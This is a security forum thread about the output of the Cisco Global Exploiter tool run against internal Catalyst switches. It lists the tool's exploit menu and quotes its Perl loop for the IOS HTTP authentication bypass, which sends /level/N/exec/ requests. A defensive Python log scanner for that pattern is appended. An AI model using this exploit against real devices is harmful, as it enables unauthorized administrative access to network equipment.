Thread: cisco global exploiter

  1. #1
    Junior Member
    Join Date
    May 2008
    Posts
    35

    Question cisco global exploiter

    I am testing 4 of our internat Cisco Catalyst with Cisco Global Exploiter and each time I get: vulnerability successfully exploited with 16
    What does that mean?
    I searched Google and didn't find any helpful information.

  2. #2
    Senior Member secure_it's Avatar
    Join Date
    Feb 2010
    Location
    Between the two: BackTrack is 4, FwdTrack4
    Posts
    854

    Lightbulb

    Quote Originally Posted by demonize View Post
    I am testing 4 of our internat Cisco Catalyst with Cisco Global Exploiter and each time I get: vulnerability successfully exploited with 16
    What does that mean?
    I searched Google and didn't find any helpful information.
    It's intranet, and what kind of vulnerabilities have you got to exploit? Cisco IOS or SNMP exploits?

  3. #3
    Junior Member
    Join Date
    May 2008
    Posts
    35

    Default

    what kind of vulnerabilities you got to exploit.Cisco IOS or SNMP Exploits?
    Sorry, I am not sure what you're asking.
    ./cge.pl -h host -v 3 ( cisco IOS HTTP Auth Vulnerability)

    vulnerability successfully exploited with 16
    WHAT DOES THAT MEAN?????????????????

  4. #4
    My life is this forum thorin's Avatar
    Join Date
    Jan 2010
    Posts
    2,629

    Default

    What is the actual command you're typing?
    I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.

    I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.

  5. #5
    Senior Member secure_it's Avatar
    Join Date
    Feb 2010
    Location
    Between the two: BackTrack is 4, FwdTrack4
    Posts
    854

    Lightbulb

    Quote Originally Posted by thorin View Post
    What is the actual command you're typing?
    He has mentioned the command already
    ./cge.pl -h host -v 3 ( cisco IOS HTTP Auth Vulnerability)
    for exploiting HTTP authentication on Cisco IOS.

  6. #6
    My life is this forum thorin's Avatar
    Join Date
    Jan 2010
    Posts
    2,629

    Default

    Quote Originally Posted by secure_it View Post
    He has mentioned the command already
    ./cge.pl -h host -v 3 ( cisco IOS HTTP Auth Vulnerability)
    for exploiting HTTP authentication on Cisco IOS.
    That does not follow the syntax required by the script.
    If that's the command he used then there's no surprise it didn't work unless "host" is actually a valid hostname on his local network which seems doubtful. Additionally the -v switch does not take a string "3 ( cisco IOS HTTP Auth Vulnerability)".

  7. #7
    Junior Member
    Join Date
    May 2008
    Posts
    35

    Default

    Additionally the -v switch does not take a string "3 ( cisco IOS HTTP Auth Vulnerability)".
    Here is how I typed it in
    ./cge.pl 192.168.1.254 -v 3
    [1] - Cisco 677/678 Telnet Buffer Overflow Vulnerability

    [2] - Cisco IOS Router Denial of Service Vulnerability

    [3] - Cisco IOS HTTP Auth Vulnerability

    [4] - Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability

    [5] - Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability

    [6] - Cisco 675 Web Administration Denial of Service Vulnerability

    [7] - Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability

    [8] - Cisco IOS Software HTTP Request Denial of Service Vulnerability

    [9] - Cisco 514 UDP Flood Denial of Service Vulnerability

  8. #8
    My life is this forum thorin's Avatar
    Join Date
    Jan 2010
    Posts
    2,629

    Default

    Quote Originally Posted by demonize View Post
    Here is how I typed it in
    ./cge.pl 192.168.1.254 -v 3
    Ok that's what I was looking for (even if secure_it didn't get it).

    Now looking at the code of the script. If the message you're getting back is:
    Code:
    vulnerability successfully exploited with 16
    Then it's not parsing things correctly or it's not happy with your Cisco device somehow.
    If things were working correctly for the commandline you provided it should return:
    Code:
    Vulnerability successful exploited with [http://192.168.1.254/level/16/exec/....]
    However, if you look at the code you can simply do the test via any browser and see if successful or not.

  9. #9
    Senior Member secure_it's Avatar
    Join Date
    Feb 2010
    Location
    Between the two: BackTrack is 4, FwdTrack4
    Posts
    854

    Question

    Quote Originally Posted by thorin View Post
    Ok that's what I was looking for (even if secure_it didn't get it).

    Now looking at the code of the script. If the message you're getting back is:
    Code:
    vulnerability successfully exploited with 16
    Then it's not parsing things correctly or it's not happy with your Cisco device somehow.
    If things were working correctly for the commandline you provided it should return:
    Code:
    Vulnerability successful exploited with [http://192.168.1.254/level/16/exec/....]
    However, if you look at the code you can simply do the test via any browser and see if successful or not.
    If I am not wrong, level 16 is pointing to a privilege level that is in execution mode, but to my knowledge there are levels only up to 15, or administrator level. Correct me, thorin, if I am wrong. HTTP or SDM access is restricted by default to level 15 users only. Is this vulnerability trying to break in using level 15 privilege?

  10. #10
    My life is this forum thorin's Avatar
    Join Date
    Jan 2010
    Posts
    2,629

    Default

    Yup you're kinda right, but the variable which represents the level in the code is primed to a value of 16 and loops through every value to 99.
    Code:
    sub cisco3 # Cisco IOS HTTP Auth Vulnerability
    {
      my $serv= $host;
      my $n=16;
      my $port=80;
    
      my $target = inet_aton($serv);
      my $fg = 0;
    
      LAB: while ($n<100) {
      my @results=exploit("GET /level/".$n."/exec/- HTTP/1.0\r\n\r\n");
      $n++;
      foreach $line (@results){
              $line=~ tr/A-Z/a-z/;
              if ($line =~ /http\/1\.0 401 unauthorized/) {$fg=1;}
              if ($line =~ /http\/1\.0 200 ok/) {$fg=0;}
      }
    
    ..........
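
A defender-side check for the request pattern in the code quoted in post #10, as an added example that is not part of the thread or of cge.pl: it scans HTTP logs for `/level/N/exec/` requests with N above 15 and separates refused probes from requests the device answered with 200. The common-log-style format, the `scan` function and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# IOS privilege levels are 0-15; the quoted script requests /level/16 .. /level/99.
MAX_VALID_LEVEL = 15
REQ = re.compile(r'"(?:GET|HEAD|POST) /level/(\d{1,3})/exec/\S* HTTP/1\.[01]" (\d{3})')

# Constructed sample lines (hypothetical sensor or proxy in front of the switches).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Mar/2010:10:00:01 +0000] "GET /level/15/exec/show/version HTTP/1.0" 200 512
192.168.1.50 - - [01/Mar/2010:10:02:10 +0000] "GET /level/16/exec/- HTTP/1.0" 401 0
192.168.1.50 - - [01/Mar/2010:10:02:11 +0000] "GET /level/17/exec/- HTTP/1.0" 401 0
192.168.1.50 - - [01/Mar/2010:10:02:12 +0000] "GET /level/18/exec/- HTTP/1.0" 401 0
192.168.1.77 - - [01/Mar/2010:10:05:00 +0000] "GET /level/16/exec/- HTTP/1.0" 401 0
192.168.1.77 - - [01/Mar/2010:10:05:01 +0000] "GET /level/17/exec/- HTTP/1.0" 200 1830
192.168.1.60 - - [01/Mar/2010:10:09:30 +0000] "GET /level/16/exec/- HTTP/1.0" 401 0
"""

def scan(log_text, sweep_threshold=3):
    """Return {source_ip: (verdict, levels)} for requests above level 15."""
    seen = defaultdict(set)      # source -> every out-of-range level requested
    accepted = defaultdict(set)  # source -> out-of-range levels answered with 200
    for line in log_text.splitlines():
        m = REQ.search(line)
        if not m:
            continue
        level, status = int(m.group(1)), int(m.group(2))
        if level <= MAX_VALID_LEVEL:
            continue             # level is in the valid 0-15 range, not this pattern
        src = line.split(" ", 1)[0]
        seen[src].add(level)
        if status == 200:
            accepted[src].add(level)
    findings = {}
    for src, levels in seen.items():
        if accepted[src]:
            # An exec page was served without a 401: treat the device as exposed.
            findings[src] = ("accepted", sorted(accepted[src]))
        elif len(levels) >= sweep_threshold:
            findings[src] = ("sweep", sorted(levels))
        else:
            findings[src] = ("probe", sorted(levels))
    return findings

if __name__ == "__main__":
    for src, (verdict, levels) in sorted(scan(SAMPLE_LOG).items()):
        print(f"{src}: {verdict} levels={levels}")
```

An "accepted" verdict is the one that needs follow-up on the device itself: upgrade the IOS image or disable the HTTP server on that switch.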
